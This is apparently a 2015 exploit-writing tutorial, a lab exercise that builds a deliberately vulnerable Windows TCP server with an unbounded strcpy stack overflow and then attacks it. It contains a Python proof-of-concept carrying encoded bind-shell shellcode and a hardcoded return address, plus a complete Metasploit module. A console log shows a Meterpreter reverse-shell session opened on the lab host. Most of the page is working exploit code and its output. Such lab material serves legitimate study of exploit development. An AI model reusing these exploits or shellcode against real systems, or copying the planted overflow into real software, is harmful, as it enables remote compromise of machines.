exploit - write metasploit exploit script
2015-06-22 19:23
Create Vuln Server
// Compile the source code with VC6.0 / Dev C++.
//
// Deliberately vulnerable lab target for the exercise on this page: a
// single-shot TCP server that accepts one client on tcp/9000, performs one
// recv() and hands the bytes to pr(), whose unbounded strcpy() is the planted
// stack overflow. <iostream.h> is the pre-standard C++ header VC6 ships; nothing
// from it is used here.
#include <iostream.h>
#include <stdio.h>
#include <winsock.h>
#include <windows.h>

//load windows socket
#pragma comment(lib, "wsock32.lib")

//Define Return Messages
#define SS_ERROR 1
#define SS_OK 0

// Planted bug: str is copied into a 500-byte stack buffer with no length
// check, so a message longer than the buffer overwrites the saved frame (the
// rest of the page depends on exactly this layout). A fixed version would
// bound the copy (e.g. a size-limited snprintf) and reject over-long input.
void pr( char *str)
{
    char buf[500]="";
    strcpy(buf,str);
}

// Report a Winsock failure in a message box and tear Winsock down. The
// bind/listen/accept error paths in main() call WSACleanup() again after this
// returns, so cleanup runs twice there.
void sError(char *str)
{
    MessageBox (NULL, str, "socket Error" ,MB_OK);
    WSACleanup();
}

// Returns SS_OK after serving one client, SS_ERROR on any Winsock failure.
int main(int argc, char **argv)
{
    WORD sockVersion;
    WSADATA wsaData;
    int rVal;
    // Zero-filled at declaration: a read shorter than 5000 bytes is therefore
    // NUL-terminated; a read of exactly 5000 bytes is not, and pr()'s strcpy()
    // would then run past the end of Message.
    char Message[5000]="";
    // Not used anywhere in main().
    char buf[2000]="";
    // server port: 9000
    u_short LocalPort;
    LocalPort = 9000;
    //wsock32 initialized for usage (return value is not checked)
    sockVersion = MAKEWORD(1,1);
    WSAStartup(sockVersion, &wsaData);
    //create server socket
    SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0);
    if(serverSocket == INVALID_SOCKET)
    {
        sError("Failed socket()");
        return SS_ERROR;
    }
    SOCKADDR_IN sin;
    sin.sin_family = PF_INET;
    sin.sin_port = htons(LocalPort);
    sin.sin_addr.s_addr = INADDR_ANY;   // listens on every interface
    //bind the socket
    rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin));
    if(rVal == SOCKET_ERROR)
    {
        sError("Failed bind()");
        WSACleanup();
        return SS_ERROR;
    }
    //get socket to listen
    rVal = listen(serverSocket, 10);
    if(rVal == SOCKET_ERROR)
    {
        sError("Failed listen()");
        WSACleanup();
        return SS_ERROR;
    }
    printf("[+] listening on tcp/9000... \n");
    //wait for a client to connect (exactly one; the process exits afterwards)
    SOCKET clientSocket;
    clientSocket = accept(serverSocket, NULL, NULL);
    if(clientSocket == INVALID_SOCKET)
    {
        sError("Failed accept()");
        WSACleanup();
        return SS_ERROR;
    }
    int bytesRecv = SOCKET_ERROR;
    // Loops only while recv() reports SOCKET_ERROR, i.e. a failure is silently
    // retried and the first successful read ends the loop.
    while( bytesRecv == SOCKET_ERROR )
    {
        //receive the data that is being sent by the client max limit to 5000 bytes.
        bytesRecv = recv( clientSocket, Message, 5000, 0 );
        // recv() returns a byte count; WSAECONNRESET is a WSAGetLastError()
        // code, so the second comparison is against a byte count and cannot
        // match under the 5000-byte cap. Only a 0 (peer closed) return takes
        // this branch.
        if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET )
        {
            printf("\nConnection Closed.\n");
            break;
        }
    }
    //Pass the data received to the function pr (no length is passed along)
    pr(Message);
    //close client socket
    closesocket(clientSocket);
    //close server socket
    closesocket(serverSocket);
    WSACleanup();
    return SS_OK;
}
Stack Overflow
#!/usr/bin/env python
# -*- coding: utf8 -*-
# Please exploit vuln-server.exe with stack overflow bug.
#
# Standalone proof-of-concept from the write-up against the vulnerable server
# listed above, run on the same host (127.0.0.1:9000). Python 2: the payload
# is assembled from byte strings. Layout: 500 bytes of filler, a 4-byte
# little-endian return-address overwrite (7C86467B, the same address the MSF
# module below records for its Windows XP SP3 target), the generated payload,
# then 1500 NOPs.
import socket

csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect_ex() returns 0 on success; on any other result the script does
# nothing and exits silently.
ret = csock.connect_ex(("127.0.0.1", 9000))
if (ret == 0):
    junk = "A" * 500
    eip = "\x7B\x46\x86\x7C" # 7C86467B
    # bad chars: 00
    # windows/shell_bind_tcp - 355 bytes
    # http://www.metasploit.com
    # Encoder: x86/shikata_ga_nai
    # VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
    # EXITFUNC=seh, InitialAutoRunScript=, AutoRunScript=
    # Encoder-generated bytes, reproduced from the page as-is (opaque here).
    buf = "\x90" * 20
    buf += "\xba\x09\xb0\x2e\x7e\xdb\xc0\xd9\x74\x24\xf4\x5d\x31"
    buf += "\xc9\xb1\x53\x83\xc5\x04\x31\x55\x0e\x03\x5c\xbe\xcc"
    buf += "\x8b\xa2\x56\x92\x74\x5a\xa7\xf3\xfd\xbf\x96\x33\x99"
    buf += "\xb4\x89\x83\xe9\x98\x25\x6f\xbf\x08\xbd\x1d\x68\x3f"
    buf += "\x76\xab\x4e\x0e\x87\x80\xb3\x11\x0b\xdb\xe7\xf1\x32"
    buf += "\x14\xfa\xf0\x73\x49\xf7\xa0\x2c\x05\xaa\x54\x58\x53"
    buf += "\x77\xdf\x12\x75\xff\x3c\xe2\x74\x2e\x93\x78\x2f\xf0"
    buf += "\x12\xac\x5b\xb9\x0c\xb1\x66\x73\xa7\x01\x1c\x82\x61"
    buf += "\x58\xdd\x29\x4c\x54\x2c\x33\x89\x53\xcf\x46\xe3\xa7"
    buf += "\x72\x51\x30\xd5\xa8\xd4\xa2\x7d\x3a\x4e\x0e\x7f\xef"
    buf += "\x09\xc5\x73\x44\x5d\x81\x97\x5b\xb2\xba\xac\xd0\x35"
    buf += "\x6c\x25\xa2\x11\xa8\x6d\x70\x3b\xe9\xcb\xd7\x44\xe9"
    buf += "\xb3\x88\xe0\x62\x59\xdc\x98\x29\x36\x11\x91\xd1\xc6"
    buf += "\x3d\xa2\xa2\xf4\xe2\x18\x2c\xb5\x6b\x87\xab\xba\x41"
    buf += "\x7f\x23\x45\x6a\x80\x6a\x82\x3e\xd0\x04\x23\x3f\xbb"
    buf += "\xd4\xcc\xea\x56\xdc\x6b\x45\x45\x21\xcb\x35\xc9\x89"
    buf += "\xa4\x5f\xc6\xf6\xd5\x5f\x0c\x9f\x7e\xa2\xaf\x8e\x22"
    buf += "\x2b\x49\xda\xca\x7d\xc1\x72\x29\x5a\xda\xe5\x52\x88"
    buf += "\x72\x81\x1b\xda\x45\xae\x9b\xc8\xe1\x38\x10\x1f\x36"
    buf += "\x59\x27\x0a\x1e\x0e\xb0\xc0\xcf\x7d\x20\xd4\xc5\x15"
    buf += "\xc1\x47\x82\xe5\x8c\x7b\x1d\xb2\xd9\x4a\x54\x56\xf4"
    buf += "\xf5\xce\x44\x05\x63\x28\xcc\xd2\x50\xb7\xcd\x97\xed"
    buf += "\x93\xdd\x61\xed\x9f\x89\x3d\xb8\x49\x67\xf8\x12\x38"
    buf += "\xd1\x52\xc8\x92\xb5\x23\x22\x25\xc3\x2b\x6f\xd3\x2b"
    buf += "\x9d\xc6\xa2\x54\x12\x8f\x22\x2d\x4e\x2f\xcc\xe4\xca"
    buf += "\x51\x3c\x34\xc7\xc6\xe7\xad\xaa\x8a\x17\x18\xe8\xb2"
    buf += "\x9b\xa8\x91\x40\x83\xd9\x94\x0d\x03\x32\xe5\x1e\xe6"
    buf += "\x34\x5a\x1e\x23"
    nops = "\x90" * 1500
    payload = junk + eip + buf + nops
    csock.send(payload)
    csock.close()
Write MSF exploit script
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# Metasploit module from the write-up for the vulnerable server listed above.
# The Ret/Offset pair in 'Targets' is specific to the author's Windows XP SP3
# lab image; 'BadChars' lists the bytes the encoder has to avoid; 'Space' is
# the room the module advertises for the encoded payload.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  # Module metadata; the only option registered on top of the Tcp mixin's
  # defaults is RPORT, preset to the server's port 9000.
  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Custom Vulnable Tcp Server Buffer Overflow',
      'Description'    => %q{
        'This module exploits a custom windows tcp server'
      },
      'Author'         => [ 'Nixawk' ],
      'License'        => MSF_LICENSE,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'AllowWin32SEH' => true
        },
      'Payload'        =>
        {
          'Space'    => 1400,
          'BadChars' => "\x00\xFF",
          'StackAdjustment' => -3500
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows XP SP3 En', {'Ret' => 0x7C86467B, 'Offset' => 496}]
        ],
      'Privileged'     => false,
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'June 20 2015'
    ))

    register_options([Opt::RPORT(9000)], self.class)
  end

  # Builds the request with the Tcp/Seh mixin helpers, sends it over the
  # mixin-managed socket, then starts the payload handler before disconnecting.
  def exploit
    # The two lines below appear to be a pasted console log from an earlier
    # failed run rather than a description of the method; kept as the author
    # left them.
    # [*] Started reverse handler on 192.168.1.108:4444
    # [-] Exploit failed: TypeError no implicit conversion of String into Integer
    connect

    sploit = rand_text(target['Offset'])
    sploit << generate_seh_record(target.ret)
    # sploit << make_nops(50)
    sploit << payload.encoded

    sock.put(sploit)

    handler
    disconnect
  end
end
Exploit Vuln Server with MSF
msf exploit(custom_vulnserver) > show options Module options (exploit/windows/misc/custom_vulnserver): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.1.105 yes The target address RPORT 9000 yes The target port Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC seh yes Exit technique (Accepted: , , seh, thread, process, none) LHOST 192.168.1.108 yes The listen address LPORT 8080 yes The listen port Exploit target: Id Name -- ---- 0 Windows XP SP3 En msf exploit(custom_vulnserver) > exploit [*] Started reverse handler on 192.168.1.108:8080 [*] Sending stage (884270 bytes) to 192.168.1.105 [*] Meterpreter session 2 opened (192.168.1.108:8080 -> 192.168.1.105:1557) at 2015-06-22 11:16:47 +0000 meterpreter > sysinfo Computer : CORELAN-LAB OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : zh_CN Domain : MSHOME Logged On Users : 2 Meterpreter : x86/win32 meterpreter >
References
https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/